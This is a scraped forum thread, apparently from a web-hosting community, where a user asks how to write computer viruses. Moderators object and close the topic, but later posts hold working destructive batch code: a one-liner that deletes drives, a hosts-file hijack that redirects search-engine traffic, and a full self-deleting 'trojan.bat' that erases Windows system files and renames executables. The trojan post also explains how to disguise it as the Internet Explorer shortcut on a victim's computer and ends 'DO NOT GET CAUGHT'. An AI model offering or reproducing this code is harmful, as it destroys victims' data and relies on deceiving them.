| | I know assembly language a bit. I heard from somewhere that ASM can be used in virus writing. So i would like to read something about the concepts of virus making. Have anyone here already had an experience in this ? |
| Nov 21, 2009 |
just type @echo DEL C: -Y DEL D: -Y it deletes everything on the desktop and is simple.!
And I am trying to learn how to prevent people from learning how to create viruses. A lot of problems already arised from people doing mistakes when creating a virus.
I don't think you'll get much information here since this is in direct violation with our TOS. I'm not sure but probably the admins will close/delete your post. Please don't do this anymore.
-=jeroen=- QUOTE(warbird @ Dec 31 2005, 05:51 PM) I don't think you'll get much information here since this is in direct violation with our TOS. I'm not sure but probably the admins will close/delete your post. Please don't do this anymore. -=jeroen=- Sorry then, i didn't know anything about this QUOTE There is a freedom about this Freedom, yes. Danger for the whole community, no.
Yea it can be educational probably, but still you'd probably have better luck looking at forums where virus creation and the more dark side of programming are the common element.
Personally I've yet to program anything even virus-esque... except a couple fork() bombs that I tricked people into using but those were more of a nuisance and non-self replicating then anything haha... For example, my so-called virus did the following. When started, it changed a windows file called "hosts". If you put CODE 256.256.256.256 www.google.com It will tako you to the mentioned ip address when you type www.google.com in your browser. I put my web site's IP address and some popular search engine's urls. I also made a program that returned everything back to normal. It is a nice program, but works only with WinXP installed on C: (I hade only the basic programming knowledge). You see, even with the most simple programming languages you can make something good. This is not really a virus. Hope I didn't break any rules
As i know virus is a program that can copy itself and always stays in memory :-)
Ok then, this is just a program that plays with your computer.
On the other hand, think about a program like mine which is always running in the background and does the ip thing with any web site the user goes to. Now that would be nice. You want to google smth You go to google You google it and go to a result Then you wanna google again You type www.google.com - and it takes you to a completely different web site! Nice!
We'd a similar thread discussing some technical aspects of hacking quite sometime back. I let the thread go on with a minor warning that NO POTENTIALLY HARMFUL information is discussed here. You guys are all responsible people and know where to draw the line. So I won't close the thread but let it go on, like I did before. But any signs of deviating from that thin line - will result in sudden death of this thread
There's a that lot you can discuss about authoring a virus - without bringing in the harmful codes and associated stuff into the discussion. Latest Entriesjust type @echo DEL C: -Y DEL D: -Y it deletes everything on the desktop and is simple.! Sorry, But we should not be discusing this in Asta Host. Anyways, it is illegal. This is also my opinion. That's why I close this topic.
Sorry, But we should not be discusing this in Asta Host. Anyways, it is illegal.
trojan virus
How To Write A Virus ? this is a self deleting trojan, once it dose its job it will erase its self. copy and pase it in notepad and save it as trojan.Bat then once its made put it on a disk or flash drive and put it on the desktop of the victom's computer. Right-click it and creat short cut. Change the name of the short cut(after deleting the orignal) to "internet explorer" and right-click and click properties and click the shortcut tab. Click "change icon..." and find the internet explorer picture, click it and click apply on the bottom right. Delet the real I.E. And replace it with the virus. when clicked it will activated the trojan. here is the code: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~START OF CODE~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ @echo off cd\ if exist c:\windows goto winslows if exist c:\dos goto do$ :poof erase * goto end_trojan :winblows cd\windows if exist system.Ini del system.Ini if exist win.Ini erase win.Ini ren *.Exe *.Vxe ren *.Dat *.Cat ren *.Sys *.Sex goto end_trojan :do$ cd\dos ren *.Com *.Kom ren *.Exe *.Com ren *.Kom *.Exe if exist c:\command.Com erase c:\command.Com :end_trojan erase trojan.Bat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~END OF CODE~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ have fun and DO NOT GET CAUGHT! -reply by bill nye the nutsack guyheres a simple one but doesnt save or delete its self to anything. (use in note pad then save as "name".Bat then your done) @echo off :top START %SystemStart%/system32/notepad.Exe GOTO top its something like that p.S I'm only 13 so I hardly know anything about how to do these this is my fav none destructive virus |
![]() How To Write A Virus ? |
Affordable Web Hosting, Low cost Web Hosting - ComputingHost.com